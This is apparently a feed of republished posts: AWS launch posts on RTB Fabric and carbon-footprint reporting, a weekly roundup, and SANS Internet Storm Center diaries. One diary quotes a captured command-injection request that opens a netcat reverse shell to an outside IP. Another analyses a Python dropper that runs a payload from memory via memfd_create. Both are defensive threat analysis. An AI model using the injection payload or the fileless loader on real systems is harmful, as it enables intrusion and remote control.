Introducing AWS RTB Fabric for real-time advertising technology workloads

This post was originally published on this site

Today, we’re announcing AWS RTB Fabric, a fully managed service purpose-built for real-time bidding (RTB) advertising workloads. The service helps advertising technology (AdTech) companies seamlessly connect with their supply and demand partners, such as Amazon Ads, GumGum, Kargo, MobileFuse, Sovrn, TripleLift, Viant, Yieldmo, and more, to run high-volume, latency-sensitive RTB workloads on Amazon Web Services (AWS) with consistent single-digit millisecond performance and up to 80% lower networking costs compared to standard networking.

AWS RTB Fabric provides a dedicated, high-performance network environment for RTB workloads and partner integrations without requiring colocated, on-premises infrastructure or upfront commitments. The following diagram shows the high-level architecture of RTB Fabric.

AWS RTB Fabric also includes modules, a capability that helps customers bring their own and partner applications securely into the compute environment used for real-time bidding. Modules support containerized applications and foundation models (FMs) that can enhance transaction efficiency and bidding effectiveness. At launch, AWS RTB Fabric includes modules for optimizing traffic management, improving bid efficiency, and increasing bid response rates, all running inline within the service for consistent low-latency execution.

The growth of programmatic advertising has created a need for low-latency, cost-efficient infrastructure to support RTB workloads. AdTech companies process millions of bid requests per second across publishers, supply-side platforms (SSPs), and demand-side platforms (DSPs). These workloads are highly sensitive to latency because most RTB auctions must complete within 200–300 milliseconds and require reliable, high-speed exchange of OpenRTB requests and responses among multiple partners. Many companies have addressed this by deploying infrastructure in colocation data centers near key partners, which reduces latency but adds operational complexity, long provisioning cycles, and high costs. Others have turned to cloud infrastructure to gain elasticity and scale, but they often face complex provisioning, partner-specific connectivity, and long-term commitments to achieve cost efficiency. These gaps add operational overhead and limit agility. AWS RTB Fabric solves these challenges by providing a managed private network built for RTB workloads that delivers consistent performance, simplifies partner onboarding, and achieves predictable cost efficiency without the burden of maintaining colocation or custom networking setups.
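To make the protocol concrete, here is a minimal, illustrative OpenRTB 2.x bid request sketched as a Python dictionary (all field values are made up; real requests carry many more fields):

import json

# Minimal illustrative OpenRTB 2.x bid request (all field values are made up)
bid_request = {
    "id": "8f1a2b3c",                          # unique auction ID
    "tmax": 120,                               # milliseconds the bidder has to respond in
    "imp": [{                                  # the impression being auctioned
        "id": "1",
        "banner": {"w": 300, "h": 250},
        "bidfloor": 0.50,                      # floor price in CPM
    }],
    "site": {"domain": "news.example.com"},
    "device": {"ua": "Mozilla/5.0", "ip": "203.0.113.10"},
}

print(json.dumps(bid_request))                 # body of the HTTP POST sent to each bidder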

Key capabilities
AWS RTB Fabric introduces a managed foundation for running RTB workloads at scale. The service provides the following key capabilities:

  • Simplified connectivity to AdTech partners – When you register an RTB Fabric gateway, the service automatically generates secure endpoints that can be shared with selected partners. Using the AWS RTB Fabric API, you can create optimized, private connections to exchange RTB traffic securely across different environments. External Links are also available to connect with partners who aren’t using RTB Fabric, such as those operating on premises or in third-party cloud environments. This approach shortens integration time and simplifies collaboration among AdTech participants.
  • Dedicated network for low-latency advertising transactions – AWS RTB Fabric provides a managed, high-performance network layer optimized for OpenRTB communication. It connects AdTech participants such as SSPs, DSPs, and publishers through private, high-speed links that deliver consistent single-digit millisecond latency. The service automatically optimizes routing paths to maintain predictable performance and reduce networking costs, without requiring manual peering or configuration.
  • Pricing model aligned with RTB economics – AWS RTB Fabric uses a transaction-based pricing model designed to align with programmatic advertising economics. Customers are billed per billion transactions, providing predictable infrastructure costs that align with how advertising exchanges, SSPs, and DSPs operate.
  • Built-in traffic management modules – AWS RTB Fabric includes configurable modules that help AdTech workloads operate efficiently and reliably. Modules such as Rate Limiter, OpenRTB Filter, and Error Masking help you control request volume, validate message formats, and manage response handling directly in the network path. These modules execute inline within the AWS RTB Fabric environment, maintaining network-speed performance without adding application-level latency. All configurations are managed through the AWS RTB Fabric API, so you can define and update rules programmatically as your workloads scale.

Getting started
Today, you can start building with AWS RTB Fabric using the AWS Management Console, AWS Command Line Interface (AWS CLI), or infrastructure-as-code (IaC) tools such as AWS CloudFormation and Terraform.

The console provides a visual entry point to view and manage RTB gateways and links, as shown on the Dashboard of the AWS RTB Fabric console.

You can also use the AWS CLI to configure gateways, create links, and manage traffic programmatically. When I started building with AWS RTB Fabric, I used the AWS CLI for everything from gateway creation to link setup and traffic monitoring. The setup ran inside my Amazon Virtual Private Cloud (Amazon VPC) while AWS managed the low-latency infrastructure connecting the workloads.

To begin, I created a requester gateway to send bid requests and a responder gateway to receive and process bid responses. These gateways act as secure communication points within the AWS RTB Fabric.

# Create a requester gateway with required parameters
aws rtbfabric create-requester-gateway \
  --description "My RTB requester gateway" \
  --vpc-id vpc-12345678 \
  --subnet-ids subnet-abc12345 subnet-def67890 \
  --security-group-ids sg-12345678 \
  --client-token "unique-client-token-123"

# Create a responder gateway with required parameters
aws rtbfabric create-responder-gateway \
  --description "My RTB responder gateway" \
  --vpc-id vpc-01f345ad6524a6d7 \
  --subnet-ids subnet-abc12345 subnet-def67890 \
  --security-group-ids sg-12345678 \
  --dns-name responder.example.com \
  --port 443 \
  --protocol HTTPS

After both gateways were active, I created a link from the requester to the responder to establish a private, low-latency communication path for OpenRTB traffic. The link handled routing and load balancing automatically.

# Requester account creating a link from requester gateway to a responder gateway
aws rtbfabric create-link \
  --gateway-id rtb-gw-requester123 \
  --peer-gateway-id rtb-gw-responder456 \
  --log-settings '{"applicationLogs":{"sampling":{"errorLog":10.0,"filterLog":10.0}}}'

# Responder account accepting a link from requester gateway to responder gateway
aws rtbfabric accept-link \
  --gateway-id rtb-gw-responder456 \
  --link-id link-reqtoresplink789 \
  --log-settings '{"applicationLogs":{"sampling":{"errorLog":10.0,"filterLog":10.0}}}'

I also connected with external partners using External Links, which extended my RTB workloads to on-premises or third-party environments while maintaining the same latency and security characteristics.

# Create an inbound external link endpoint for an external partner to send bid requests to
aws rtbfabric create-inbound-external-link \
  --gateway-id rtb-gw-responder456

# Create an outbound external link for sending bid requests to an external partner
aws rtbfabric create-outbound-external-link \
  --gateway-id rtb-gw-requester123 \
  --public-endpoint "https://my-external-partner-responder.com"

To manage traffic efficiently, I added modules directly into the data path. The Rate Limiter module controlled request volume, and the OpenRTB Filter validated message formats inline at network speed.

# Attach a rate limiting module
aws rtbfabric update-link-module-flow \
  --gateway-id rtb-gw-responder456 \
  --link-id link-toresponder789 \
  --modules '{"name":"RateLimiter","moduleParameters":{"rateLimiter":{"tps":10000}}}'

Finally, I used Amazon CloudWatch to monitor throughput, latency, and module performance, and I exported logs to Amazon Simple Storage Service (Amazon S3) for auditing and optimization.
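Here is a rough sketch of how that monitoring could be scripted with boto3; the namespace, metric name, and dimension are placeholders I'm assuming for illustration, so check the AWS RTB Fabric User Guide for the metrics the service actually publishes:

from datetime import datetime, timedelta, timezone
import boto3

cloudwatch = boto3.client("cloudwatch")

# Namespace, metric name, and dimension below are assumed placeholders
response = cloudwatch.get_metric_statistics(
    Namespace="AWS/RTBFabric",                 # assumed namespace
    MetricName="RequestLatency",               # assumed metric name
    Dimensions=[{"Name": "LinkId", "Value": "link-reqtoresplink789"}],
    StartTime=datetime.now(timezone.utc) - timedelta(hours=1),
    EndTime=datetime.now(timezone.utc),
    Period=300,
    Statistics=["Average", "Maximum"],
)

for point in sorted(response["Datapoints"], key=lambda p: p["Timestamp"]):
    print(point["Timestamp"], round(point["Average"], 2), round(point["Maximum"], 2))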

All configurations can also be automated with AWS CloudFormation or Terraform, allowing consistent, repeatable deployment across multiple environments. With RTB Fabric, I could focus on optimizing bidding logic while AWS maintained predictable, single-digit millisecond performance across my AdTech partners.

For more details, refer to the AWS RTB Fabric User Guide.

Now available
AWS RTB Fabric is available today in the following AWS Regions: US East (N. Virginia), US West (Oregon), Asia Pacific (Singapore), Asia Pacific (Tokyo), Europe (Frankfurt), and Europe (Ireland).

AWS RTB Fabric is continually evolving to address the changing needs of the AdTech industry. The service will continue to expand its capabilities to support secure integration of advanced applications and AI-driven optimizations into real-time bidding workflows, helping customers simplify operations and improve performance on AWS. To learn more about AWS RTB Fabric, visit the AWS RTB Fabric page.

Betty

Customer Carbon Footprint Tool Expands: Additional emissions categories including Scope 3 are now available

This post was originally published on this site

Since its launch in 2022, the Customer Carbon Footprint Tool (CCFT) has supported our customers’ sustainability journey to track, measure, and review their carbon emissions by providing estimates of the emissions associated with their usage of Amazon Web Services (AWS).

In April, we made major updates to the CCFT, including easier access to carbon emissions data, visibility into emissions by AWS Region, inclusion of emissions calculated with the location-based method (LBM), an updated, independently verified methodology, and a move to a dedicated page in the AWS Billing console.

The CCFT is informed by the Greenhouse Gas (GHG) Protocol, which classifies a company’s emissions into scopes. Today, we’re announcing the inclusion of Scope 3 emissions data and an update to Scope 1 emissions in the CCFT. The new emission categories complement the existing Scope 1 and 2 data and give our customers a comprehensive look into their carbon emissions.

In this updated methodology, we incorporate new emissions categories. We’ve added Scope 1 refrigerants and natural gas alongside the existing Scope 1 emissions from fuel combustion in emergency backup generators (diesel). Although Scope 1 emissions represent a small share of overall emissions, including them gives our customers a complete picture of their carbon emissions.

To decide which categories of Scope 3 to include in our model, we looked at how material each of them was to the overall carbon impact and confirmed that the vast majority of emissions were represented. With that in mind, the methodology now includes:

  • Fuel- and energy-related activities (“FERA” under the GHG Protocol) – This includes upstream emissions from purchased fuels, upstream emissions of purchased electricity, and transmission and distribution (T&D) losses. AWS calculates these emissions using both LBM and the market-based method (MBM).

  • IT hardware – AWS uses a comprehensive cradle-to-gate approach that tracks emissions from raw material extraction through manufacturing and transportation to AWS data centers. We use four calculation pathways: process-based life cycle assessment (LCA) with engineering attributes, extrapolation, representative category average LCA, and economic input-output LCA. AWS prioritizes the most detailed and accurate methods for components that contribute significantly to overall emissions.

  • Buildings and equipment – AWS follows established whole building life cycle assessment (wbLCA) standards, considering emissions from construction, use, and end-of-life phases. The analysis covers data center shells, rooms, and long-lead equipment such as air handling units and generators. The methodology uses both process-based life cycle assessment models and economic input-output analysis to provide comprehensive coverage.

The Scope 3 emissions are then amortized over the assets’ service life (6 years for IT hardware, 50 years for buildings) to calculate monthly emissions that can be allocated to customers. This amortization means that we fairly distribute the total embodied carbon of each asset across its operational lifetime, accounting for scenarios such as early retirement or extended use.
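As a back-of-the-envelope illustration of that amortization (the embodied-carbon figures below are invented; only the 6-year and 50-year service lives come from the methodology):

def monthly_embodied_emissions(total_kgco2e: float, service_life_years: int) -> float:
    # Spread an asset's total embodied carbon evenly across its service life, per month
    return total_kgco2e / (service_life_years * 12)

# Hypothetical server with 1,200 kgCO2e embodied carbon, amortized over 6 years
print(round(monthly_embodied_emissions(1_200, 6), 2), "kgCO2e/month")        # ~16.67
# Hypothetical building with 5,000,000 kgCO2e embodied carbon, amortized over 50 years
print(round(monthly_embodied_emissions(5_000_000, 50), 1), "kgCO2e/month")   # ~8333.3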

All these updates are part of methodology version 3.0.0 and are explained in detail in our methodology document, which has been independently verified by a third party.

How to access the CCFT
To get started, go to the AWS Billing and Cost Management console and choose Customer Carbon Footprint Tool under Cost and Usage Analysis. You can access your carbon emissions data in the dashboard, download a CSV file, or export all data using basic SQL and visualize it by integrating with AWS Data Exports and Amazon QuickSight.

To ensure you can make meaningful year-over-year comparisons, we’ve recalculated historical data back to January 2022 using version 3 of the methodology. All the data displayed in the CCFT now uses version 3. To see historical data using version 3, choose Create custom data export. Data exports now include new columns breaking down emissions by Scope 1, 2, and 3.

You can see estimated AWS emissions and estimated emissions savings. The tool shows emissions calculated using the MBM for 38 months of data by default. You can find your emissions calculated using the LBM by choosing LBM in the Calculation method filter on the dashboard. The unit of measurement for carbon emissions is metric tons of carbon dioxide equivalent (MTCO2e), an industry-standard measure.

The Carbon emissions summary shows trends in your carbon emissions over time. You can also find emissions resulting from your usage of AWS services and across all AWS Regions. To learn more, visit Viewing your carbon footprint in the AWS documentation.

Voice of the customer
Some of our customers had early access to these updates. This is what they shared with us:

Sunya Norman, senior vice president, Impact at Salesforce shared “Effective decarbonization begins with visibility into our carbon footprint, especially in Scope 3 emissions. Industry averages are only a starting point. The granular carbon data we get from cloud providers like AWS are critical to helping us better understand the actual emissions associated with our cloud infrastructure and focus reductions where they matter most.”

Gerhard Loske, Head of Environmental Management at SAP, said “The latest updates to the CCFT are a big step forward in helping us manage SAP’s sustainability goals. With new Region-specific data, we can now see better where emissions are coming from and take targeted action. The upcoming addition of Scope 3 emissions will give us a much fuller picture of our carbon footprint across AWS workloads. These improvements make it easier for us to turn data into meaningful climate action.”

Pinterest’s Global Sustainability Lead, Mia Ketterling highlighted the benefits of the Scope 3 emission data, saying, “By including Scope 3 emissions data in their CCFT, AWS empowers customers like Pinterest to more accurately measure and report the full carbon footprint of our digital operations. Enhanced transparency helps us drive meaningful climate action across our value chain.”

If you’re attending AWS re:Invent in person in December, join technical leaders from AWS, Adobe, and Salesforce as they reveal how the Customer Carbon Footprint Tool supports their environmental initiatives.

Now available
With Scope 1, 2, and 3 coverage in the CCFT, you can track your emissions over time to understand how you’re trending towards your sustainability goals and see the impact of any carbon reduction projects you’ve implemented. To learn more, visit the Customer Carbon Footprint Tool (CCFT) page.

Give these new features a try in the AWS Billing and Cost Management console and send feedback to AWS re:Post for the CCFT or through your usual AWS Support contacts.

Channy

webctrl.cgi/Blue Angel Software Suite Exploit Attempts. Maybe CVE-2025-34033 Variant?, (Wed, Oct 22nd)

This post was originally published on this site

Starting yesterday, some of our honeypots received POST requests to "/cgi-bin/webctrl.cgi", attempting to exploit an OS command injection vulnerability:

POST /cgi-bin/webctrl.cgi
Host: [honeypot ip]:80
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://[honeypot ip]:80
Dnt: 1
Connection: close
Referer: http://[honeypot ip]:80/cgi-bin/webctrl.cgi?action=pingconfig_page
Cookie: userName=admin; state=login; passWord=
Upgrade-Insecure-Requests: 1

action=pingconfig_update&pos_x=0&pos_y=0&login=3&configchanged=0&ip_address=&pingstatereloadflag=1&ipv6=1&ipaddress=;nc%2087.120.191.94%2031331%20-e/bin/sh;&count=3&size=64&start=Start

The vulnerability appears to be a "classic" OS command injection vulnerability. The "ipaddress" parameter is likely passed straight to "ping" in code like:

ping -c {count} -s {size} {ipaddress}

The count and size parameters are easy to validate as they are numbers. The ipaddress parameter is likely supposed to allow for hostnames, making validation a little bit trickier. I talked at length about OS command injection and how to prevent it in a video last year (see https://www.youtube.com/watch?v=7QDO3pZbum8 )
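For reference, a minimal sketch of the safer pattern (not the vulnerable CGI's actual code): validate the target first, then invoke ping with an argument list so the shell never interprets the input.

import ipaddress
import re
import subprocess

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")

def safe_ping(target: str, count: int = 3, size: int = 64) -> str:
    # Accept only IP literals or plausible hostnames; anything else is rejected
    try:
        ipaddress.ip_address(target)
    except ValueError:
        if not HOSTNAME_RE.match(target):
            raise ValueError("invalid ping target")
    # Passing an argument list (no shell=True) means ';nc ...' payloads are never interpreted
    result = subprocess.run(
        ["ping", "-c", str(int(count)), "-s", str(int(size)), target],
        capture_output=True, text=True, timeout=30,
    )
    return result.stdout

# safe_ping(";nc 87.120.191.94 31331 -e/bin/sh;") now raises ValueError instead of running nc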

Identifying the exact vulnerability this request attempts to exploit is not so straightforward.

Searching the National Vulnerability Database (https://nvd.nist.gov) leads to two different vulnerabilities for "webctrl.cgi":

CVE-2021-40351: webctrl.cgi.elf on Christie Digital DWU850-GS V06.46 devices allows attackers to perform any desired action via a crafted query containing an unspecified Cookie header. Authentication bypass can be achieved by including an administrative cookie that the device does not validate.

CVE-2025-34033: An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command.

The first one refers to a Cookie header. Our request does include an "interesting" Cookie header, but the exploited functionality is the "pingconfig_update" action, which points to CVE-2025-34033. However, the detailed description states:

An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command. An authenticated attacker can inject arbitrary commands by appending shell metacharacters to the ping_addr parameter in a crafted GET request to /cgi-bin/webctrl.cgi?action=pingtest_update. The command's output is reflected in the application's web interface, enabling attackers to view results directly. Default and backdoor credentials can be used to access the interface and exploit the issue. Successful exploitation results in arbitrary command execution as the root user.

Our attack uses the 'ipaddress' parameter, not the 'ping_addr' parameter. The NVD entry also suggests the exploit requires a GET request with the action set to 'pingtest_update', not a POST request with an action of 'pingconfig_update'.

There are sadly many similar vulnerabilities. Many IoT/router appliances have had vulnerabilities in their "ping" implementations in the past that looked exactly like what we have here. In 2019, an exploit was published for the underlying vulnerability that was later assigned CVE-2025-34033 [1]. The vendor behind the software, 5VTech, appears to specialize in VoIP and similar equipment for broadband networks [2].

There are two options at this point: (a) this is a new version of the CVE-2025-34033 vulnerability, or (b) the attacker messed up. Without a test device, this isn't easy to verify.

[1] https://www.exploit-db.com/exploits/46792
[2] http://www.5vtechnologies.com/


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

What time is it? Accuracy of pool.ntp.org., (Tue, Oct 21st)

This post was originally published on this site

Yesterday, Chinese security services published a story alleging a multi-year attack against the systems operating the Chinese standard time (CST), sometimes called Beijing Standard Time. China uses only one time zone across the country, and has not used daylight saving time since 1991. Most operating systems use UTC internally and display local time zones for user convenience. Modern operating systems use NTP to synchronize time. Popular implementations are ntpd and chrony. The client will poll several servers, disregard outliers, and usually sync with the "best" time server based on latency and jitter detected.
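To see what a single NTP exchange looks like, here is a bare-bones client query against pool.ntp.org (a sketch only; real clients such as ntpd and chrony add polling, outlier filtering, and clock discipline):

import socket
import struct
import time

NTP_EPOCH_OFFSET = 2208988800  # seconds between the NTP epoch (1900) and the Unix epoch (1970)

# 48-byte client request: LI=0, VN=4, Mode=3 (client) packed into the first byte
packet = b"\x23" + 47 * b"\x00"

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.settimeout(5)
    s.sendto(packet, ("pool.ntp.org", 123))
    response, _ = s.recvfrom(512)

# The server's transmit timestamp starts at byte 40: 32-bit seconds, 32-bit fraction
seconds, fraction = struct.unpack("!II", response[40:48])
server_time = seconds - NTP_EPOCH_OFFSET + fraction / 2**32
print("server time:", time.ctime(server_time), "| offset vs. local clock:",
      round(server_time - time.time(), 3), "s")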

AWS Weekly Roundup: Kiro waitlist, EBS Volume Clones, EC2 Capacity Manager, and more (October 20, 2025)

This post was originally published on this site

I’ve been inspired by all the activities that tech communities around the world have been hosting and participating in throughout the year. Here in the southern hemisphere we’re starting to dream about our upcoming summer breaks and closing out on some of the activities we’ve initiated this year. The tech community in South Africa is participating in Amazon Q Developer coding challenges that my colleagues and I are hosting throughout this month as a fun way to wind down activities for the year. The first one was hosted in Johannesburg last Friday with Durban and Cape Town coming up next.

Last week’s launches
These are the launches from last week that caught my attention:

Additional updates
I thought these projects, blog posts, and news items were also interesting:

Upcoming AWS events
Keep a look out and be sure to sign up for these upcoming events:

AWS re:Invent 2025 (December 1-5, 2025, Las Vegas) — AWS flagship annual conference offering collaborative innovation through peer-to-peer learning, expert-led discussions, and invaluable networking opportunities.

Join the AWS Builder Center to learn, build, and connect with builders in the AWS community. Browse here for upcoming in-person and virtual developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Veliswa.

Using Syscall() for Obfuscation/Fileless Activity, (Mon, Oct 20th)

This post was originally published on this site

I found another piece of malware this weekend. This one looks more like a proof-of-concept because the second-stage payload is really "simple", but it attracted my attention because it uses a nice technique to obfuscate the code.

The dropper is a simple Python script (SHA256:e6f7afb92153561ff6c584fee1b04fb132ba984e8a28ca63708a88ebad15b939) with a low VT score of 4/62[1]. The script contains an embedded Base64 payload that, once decoded, will be executed. This second stage is an ELF file, indicating the script targets a Linux system.

What attracted my attention is the direct use of syscall()[2] instead of classic functions:

import ctypes
libc = ctypes.CDLL(None)
syscall = libc.syscall
[...]
fd = syscall(319, "", 1)
os.write(fd, content)

A full list of available syscalls is documented by many websites[3]. The syscall 319 is "memfd_create" and, as the name suggests, it allows creating a file descriptor in memory (read: without touching the filesystem). 
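The diary's excerpt stops after writing the payload. For context, here is a minimal, commented sketch of the same memfd_create technique; the final execution step via /proc/self/fd is my assumption about how such droppers typically finish, not something taken from the analyzed sample:

import ctypes
import os

libc = ctypes.CDLL(None)

# memfd_create(name, flags) is syscall 319 on x86-64; it returns a file descriptor
# backed by anonymous memory, so the payload never touches the filesystem.
MFD_CLOEXEC = 1
fd = libc.syscall(319, b"", MFD_CLOEXEC)

# Write an ELF payload into the in-memory file (placeholder bytes, not the sample's)
os.write(fd, b"\x7fELF...")

# Typical (assumed) final step: execute the in-memory file through procfs
# os.execv("/proc/self/fd/%d" % fd, ["payload"])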

The Base64 payload is not very interesting: it's an ELF file (SHA256:52fc723f7e0c4202c97ac5bc2add2d1d3daa5c3f84f3d459a6a005a3ae380119) that just encrypts files using a 1-byte XOR key.
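For reference, 1-byte XOR "encryption" of the kind the payload performs boils down to something like this (illustrative only; the key is an arbitrary choice, not the sample's):

def xor_1byte(data: bytes, key: int = 0x42) -> bytes:
    # XOR every byte with the same single-byte key; the operation is its own inverse
    return bytes(b ^ key for b in data)

sample = b"hello world"
assert xor_1byte(xor_1byte(sample)) == sample   # applying it twice restores the original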

[1] https://www.virustotal.com/gui/file/e6f7afb92153561ff6c584fee1b04fb132ba984e8a28ca63708a88ebad15b939/detection
[2] https://man7.org/linux/man-pages/man2/syscalls.2.html
[3] https://www.chromium.org/chromium-os/developer-library/reference/linux-constants/syscalls/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.